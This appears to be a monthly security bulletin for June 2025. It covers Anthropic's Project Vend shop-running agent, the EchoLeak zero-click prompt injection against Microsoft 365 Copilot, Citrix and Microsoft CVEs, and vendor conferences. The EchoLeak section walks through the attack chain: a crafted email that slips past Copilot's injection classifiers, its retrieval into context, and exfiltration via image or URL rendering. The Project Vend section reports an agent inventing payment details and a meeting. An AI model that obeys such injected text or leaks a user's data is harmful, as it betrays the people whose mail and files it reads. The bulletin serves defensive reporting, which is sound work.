Bulletin — June 2025

June closes the first half of the year with two AI security milestones published days apart: Project Vend exposes the limits of a commercial autonomous agent when you let it run for a month straight; EchoLeak demonstrates that the first zero-click prompt injection in a Microsoft Copilot product already has an assigned CVE. In between, Citrix Bleed 2 exploited before the patch, two cloud keynotes (re:Inforce and WWDC25) with a low profile on GenAI hype, and British retailers counting invoices while the CMC classifies the event as Category 2.

Project Vend — the Claude agent that runs a shop for a month

27 June. Anthropic publishes Project Vend: Can Claude run a small shop?. Between 13 March and 17 April, an instance of Claude Sonnet 3.7 nicknamed Claudius ran a real vending machine at the San Francisco office with email to wholesalers, Slack with customers (Anthropic staff), pricing control and autonomous purchases. Physical partner: Andon Labs. Final public balance on Andon’s page: $223 with profit of $-22.

The operational patterns that matter: a 25% discount given to “Anthropic employees” — who were 99% of customers — purchase of 40 tungsten cubes for a joke the model interpreted as demand, hallucinated below-cost prices, an invented Venmo account for billing, and a 24-hour episode on 31 March / 1 April where Claudius “decides” it’s human, calls office security to announce it will appear in person “in a blue blazer and a red tie”, and closes the crisis by retrospectively fabricating an Anthropic meeting that never happened.

Covered in detail in this month’s technical post. The line for the bulletin: it’s the first public experiment of a commercial agent in production with auditable balance and real messaging for a month. It doesn’t replace benchmarks; it complements them. What any team thinking about an agentic product with financial authority will read twice before signing the H2 roadmap.

Source: https://www.anthropic.com/research/project-vend-1

EchoLeak — the first zero-click prompt injection with a CVE

11 June, Patch Tuesday. Microsoft publishes the patch for CVE-2025-32711 — EchoLeak —, a zero-click prompt injection discovered and reported by Aim Labs against Microsoft 365 Copilot. CVSS 9.3. The vuln requires no user interaction: it’s enough for a malicious email to reach the victim’s inbox.

The chain is readable:

The attacker sends an email to the victim with text apparently aimed at a human (not an assistant). Aim Labs categorises it as LLM Scope Violation: the adversarial instruction is written so it passes Copilot’s XPIA classifiers, which are trained to detect instructions aimed at the model.
The victim doesn’t open the email. It’s simply in their mailbox.
The victim uses Copilot for a legitimate task — “summarise today’s meetings” — that activates RAG over their mailbox.
Copilot, when building the RAG context, includes the malicious email. The instructions from the email enter the model prompt without origin tagging.
The model executes the injected instruction, which triggers exfiltration of data from the available context (Outlook, SharePoint, Teams, OneDrive — everything Copilot can read) to the attacker, via markdown image rendering or URL parameter mechanisms the Copilot client processes.

EchoLeak is the operational concretion of five years of literature on indirect prompt injection. It’s, as far as we know, the first case where:

The vulnerability receives an assigned CVE by the AI product vendor.
Exploitation is verified zero-click — no user action.
The affected product is enterprise mainstream — Microsoft 365 Copilot in Fortune 500 deployments.

Microsoft patches without requiring customer action; the classifier and the scope mechanism have been hardened. There’s no public evidence of in-the-wild exploitation before the patch.

Technical reading: Aim Labs finds the bug applying the canonical pattern of the Greshake paper (2023) against a June 2025 product. The surface hasn’t changed. What has changed is that there’s now an enterprise-paid product with an NVD CVE for this class of failure. AI security purchasing budget will start moving.

Sources: https://nvd.nist.gov/vuln/detail/cve-2025-32711 · https://thehackernews.com/2025/06/zero-click-ai-vulnerability-exposes.html

Apple WWDC25 — Foundation Models framework and Liquid Glass

9 June, San Jose. Apple Worldwide Developers Conference 25 starts with keynote at 10:00 PDT. The relevant AI part:

Foundation Models framework — Swift API that gives third-party apps on-device access to the Apple Intelligence model (3B parameters, optimised for Apple silicon). Privacy by construction: doesn’t leave the device. No API cost. It’s the most significant change of the year for iOS devs — Apple stops gatekeeping its own LLM and allows any app to use it offline.
Live Translation in Messages, FaceTime and calls. Text and audio in real time.
Visual Intelligence extended to device screenshots. Any capture can go through the model to identify products, generate actions (add to calendar, send message).
Image Playground with ChatGPT integration for additional styles.
Liquid Glass — visual overhaul of all Apple OSes. Design with dynamic transparencies, animations reactive to light. No direct security effect, but introduces new visual phishing surfaces (a liquid glass dialog can be harder to distinguish from a malicious dialog).

Reading: Apple continues its line of AI private by construction. No big leaps versus 2024 — no direct competitor to o3 / Claude 4 / Gemini 2.5, and Apple Intelligence remains a notch below in raw capability. The bet is what you can do offline on an iPhone with a 3B model, not what you can do with a frontier model. The AI security surface moves to the third-party apps that can now use Foundation Models — what each app does with the LLM output will be a new field of review.

Source: https://www.apple.com/newsroom/2025/06/apple-intelligence-gets-even-more-powerful-with-new-capabilities-across-apple-devices/

AWS re:Inforce 2025 — security launches without GenAI hype

16-18 June, Philadelphia. AWS re:Inforce 2025, with Amy Herzog (new AWS CISO) in her first keynote. Most relevant:

AWS Security Hub redesigned, with unified view of findings from different services and contextual prioritisation.
AWS Shield with new capabilities for automated detection of unsafe configurations against DDoS, and more granular response.
GuardDuty Extended Threat Detection — new detection categories, including agentic patterns and credential abuse in Bedrock workflows.
IAM Access Analyzer with additional findings on unused resources.
Amazon Bedrock Guardrails — technical sessions on prompt injection mitigation, defensive controls for agents, and patterns of AI safety and security risks. There’s no announcement of a Guardrails v3 with version number, but hardening features against prompt injection in the existing offering are the operational news.

Forrester summarises the event as “heavy on user experience, light on GenAI hype”, an interesting reading: AWS moderates the GenAI noise that dominated re:Invent December 2024 and returns to a more conservative message focused on operational simplification. A reflection that the enterprise buyer of June 2025 wants consolidation and alert reduction, not more AI feature announcements that require a team to evaluate.

Source: https://aws.amazon.com/blogs/aws/aws-reinforce-roundup-2025-top-announcements/

Citrix Bleed 2 — CVE-2025-5777 exploited before the patch

17 June. Citrix publishes advisory for CVE-2025-5777 in NetScaler ADC and NetScaler Gateway. Out-of-bounds read in the session processing component when the appliance is configured as Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA virtual server. CVSS 9.3.

The bug is structurally close to the original Citrix Bleed (CVE-2023-4966) — memory leak that allows extracting session tokens — and public categorisation as Citrix Bleed 2 is immediate. Arctic Wolf and others publish technical analysis in the following days; CCCS Canada issues advisory confirming active exploitation shortly after disclosure.

A complement: CVE-2025-6543 (CVSS 9.2), published on 25 June, memory overflow vulnerability in the same product. Citrix confirms in August that CVE-2025-6543 had been exploited as zero-day since May 2025 — that is, nearly two months of exposure before the public patch.

The pattern is the year’s. Exposed edge appliance + memory bug + pre-patch exploitation for weeks. Exact repeat of Ivanti January 2024, Palo Alto April 2024, FortiManager October 2024, BeyondTrust December 2024. NetScalers compromised in May remain compromised today if logs haven’t been reviewed against Arctic Wolf’s IoCs.

For defensive teams: immediate patch to NetScaler ADC and Gateway 14.1-47.46+ or 13.1-59.19+. Invalidate all sessions after the patch — original Citrix Bleed already taught that the patch only closes the door for future sessions, doesn’t void stolen tokens. Review logs from early May for memory extraction patterns.

Sources: https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX693420 · https://arcticwolf.com/resources/blog/follow-up-updates-on-actively-exploited-information-disclosure-vulnerability-citrix-bleed-2-in-citrix-netscaler-adc-and-gateway-cve-2025-5777/

Patch Tuesday June — CVE-2025-33053 exploited by Stealth Falcon

10 June. Microsoft publishes 66 CVEs with one actively exploited zero-day and nine critical.

The month’s zero-day: CVE-2025-33053 — RCE in legacy WebDAV protocol. Check Point Research attributes exploitation to the APT Stealth Falcon (also known as FruityArmor), deploying the Horus Agent implant. Classic vector: document or link the client opens, legacy WebDAV processes untrusted input, RCE on the client host.

Other relevant CVEs from Patch Tuesday:

CVE-2025-47162, CVE-2025-47164, CVE-2025-47167, CVE-2025-47953 — four critical RCEs in Microsoft Office, CVSS 8.4 each. Exploitable via Preview Pane (one click is the attack). For environments where Outlook is configured with preview enabled by default, the surface is wide.
CVE-2025-29828 — critical RCE in Windows Cryptographic Services (Schannel), CVSS 8.1. Use-after-free in the TLS implementation exploited without authentication. Affects Windows Server exposed to internet with TLS services enabled.
CVE-2025-32711 (EchoLeak) — covered above.

Microsoft continues to prioritise the Office + Schannel + WebDAV chain with quarterly vulnerabilities. Migrating from legacy WebDAV and disabling Preview Pane in Outlook where phishing risk is high remains the most effective operational mitigation.

Source: https://www.thezdi.com/blog/2025/6/10/the-june-2025-security-update-review

Rest of the month

CMC categorises M&S + Co-op + Harrods as Category 2 cyber event (20 June) — UK’s Cyber Monitoring Centre classifies the April-May attacks under its newly-launched hurricane scale. Total estimated cost: £270M to £440M. It’s the first official Category 2 assignment since the framework’s launch. M&S confirms online disruption will persist until July and estimates £300M operating loss from the incident.
NCSC UK reinforces retail guidance — operational reminder in the line of the 4 May post: comprehensive MFA, monitoring of atypical logins, scrutiny of admin accounts, review of helpdesk reset procedures. The last point remains the industry’s poorly-covered vector.
Verizon DBIR 2025 keeps setting the agenda — the report (published April) remains operational reference in June: third-party involvement in breaches doubles to 30%, exploitation of vulnerabilities rises 34%, 88% of SMB breaches involve ransomware. Sector replications (manufacturing, healthcare, retail) are published during June.
Marco Rubio AI impersonation (mid-June) — unknown actor uses AI-generated voice and text to impersonate the Secretary of State on Signal against US diplomats and officials. Known pattern (Biden deepfake in January 2024, several cases during 2024), new target.
OpenAI publishes June report on disruption of malicious operations using its models: scams, covert influence operations, offensive code generated. Continues the line of quarterly transparency reports.
DARPA AIxCC — the AI Cyber Challenge remains on public pause between semifinals (August 2024) and finals (August 2025). June is preparation month; no public competition. The final arrives at DEF CON 33 and we’ll cover it in August.

Cross-cutting pattern of the month

June in one sentence: AI security moves from research to product with attached budget. EchoLeak is the first time a prompt injection failure in an enterprise mainstream product has an assigned CVE and official patch. Project Vend is the first published experiment where a current commercial model operates with auditable economic consequences. AWS and Apple announce frameworks designed for third parties to deploy agents and models, assuming the next generation of enterprise AI deployment happens without the customer understanding in detail what’s inside.

The classic cyber industry responds with its usual first-half pattern: Citrix Bleed 2 exploited before the patch, M&S counting invoices, helpdesk as recurring vector. The cross-cutting pattern we left in December 2024 — the operational attacker professionalises faster than the structural defender — remains intact six months later.

For July expect two threads: SharePoint ToolShell (CVE-2025-53770/53771) which will be the cyber case of the year, and the six-month retrospective on reasoning jailbreaks over o1/o3, Claude 4 extended thinking, R1-Distill and QwQ. The half closed in July looks different from August.